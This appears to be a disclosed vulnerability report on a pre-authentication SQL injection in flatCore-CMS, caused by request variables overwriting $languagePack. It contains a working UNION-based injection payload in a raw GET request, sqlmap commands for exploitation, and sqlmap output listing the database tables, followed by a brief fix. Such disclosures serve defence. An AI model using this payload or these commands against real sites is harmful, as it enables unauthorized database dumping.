SQL Injection in flatcore/flatcore-cms

Valid

Reported on

Oct 14th 2021

Pre-Auth SQL injection

Description

flatCore-CMS is vulnerable to variable-overwritten vulnerability, leading to a Pre-Auth SQL injection in index.php

$fc_prefs = fc_get_preferences();
$languagePack = $fc_prefs['prefs_default_language'];
$_SESSION['fc_admin_helpers'] = array();


/* all requests -> strip_tags */
foreach($_REQUEST as $key => $val) {
    $$key = strip_tags($val);  //【Here】
}

And one risky variable is $languagePack

at core/functions/func_get_content.php#L72

function fc_get_content($page, $mode = 'p') {
    ..
    $nav_sql_filter = "WHERE page_language = '$languagePack' ";//#sink 1
    if(empty($_SESSION['user_class']) && $_SESSION['user_class'] != 'administrator') {
        $nav_sql_filter = "WHERE page_status != 'draft' AND page_status != 'ghost' AND page_language = '$languagePack'"; 
    }

    $nav_sql = "SELECT page_id, page_classes, page_hash, page_language, page_linkname, page_permalink, page_target, page_title, page_sort, page_status
              FROM fc_pages $nav_sql_filter ORDER BY page_sort DESC";//#sink 2

    $fc_nav = $db_content->query("$nav_sql")->fetchAll();//#sink3, PreAuth SQL INJECTION!
    $fc_nav = fc_array_multisort($fc_nav, 'page_language', SORT_ASC, 'page_sort', SORT_ASC, SORT_NATURAL);

So we could use GETto overwrite arbitratry variable below the L41, or initilizing any variable at the following context

GET /index.php?languagePack=1'+UNION+ALL+SELECT+'qzjpq'||'ikrHVivunFGyvagepQjdSdkaxMiRhlDxipFBXDmC'||'qzqjq',33,33,33,33,33,33,33,33,33--+SFpC+ HTTP/1.1
Host: flatcore

HTTP response

HTTP/1.1 404 Not Found
Date: Thu, 14 Oct 2021 13:16:13 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=7sne75a8nsrr21n6aroit7in42; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6407

<!DOCTYPE html>
<html lang="1' UNION ALL SELECT 'qzjpq'||'ikrHVivunFGyvagepQjdSdkaxMiRhlDxipFBXDmC'||'qzqjq',33,33,33,33,33,33,33,33,33-- SFpC ">
  ...

Proof of Concept

use SQLMAP to exploit this vuln automaticly

# PoC
sqlmap -u http://flatcore/index.php?languagePack=1  --dbms=SQLite --ignore-code 404  --dbs --batch

# EXP
 python sqlmap.py -u http://flatcore/index.php?languagePack=1  --dbms=SQLite --ignore-code 404 --dbs --hex --tables --batch

Impact

This vulnerability is capable of dump all data in SQLite database（i.e. the content/SQLite/content.sqlite3）, Since the original cause is variable-overwritten, an attacker mayuse this feature to exploit other DB

[21:31:02] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=hhsrdnvg04u...qk9f7th4g9'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: languagePack (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: languagePack=1' UNION ALL SELECT 'qzjpq'||'ikrHVivunFGyvagepQjdSdkaxMiRhlDxipFBXDmC'||'qzqjq',33,33,33,33,33,33,33,33,33-- SFpC
---
[21:31:02] [INFO] testing SQLite
[21:31:02] [WARNING] there was a problem decoding value '1' from expected hexadecimal form
[21:31:02] [INFO] confirming SQLite
[21:31:02] [INFO] actively fingerprinting SQLite
[21:31:02] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[21:31:02] [WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
[21:31:02] [INFO] fetching tables for database: 'SQLite_masterdb'
Database: SQLite_masterdb
[11 tables]
+----------------+
| fc_addons      |
| fc_categories  |
| fc_comments    |
| fc_feeds       |
| fc_labels      |
| fc_media       |
| fc_pages       |
| fc_pages_cache |
| fc_preferences |
| fc_textlib     |
| fc_themes      |
+----------------+
```


# recommended fix

- maintain a whitelist of `$$`, so it won't mess up.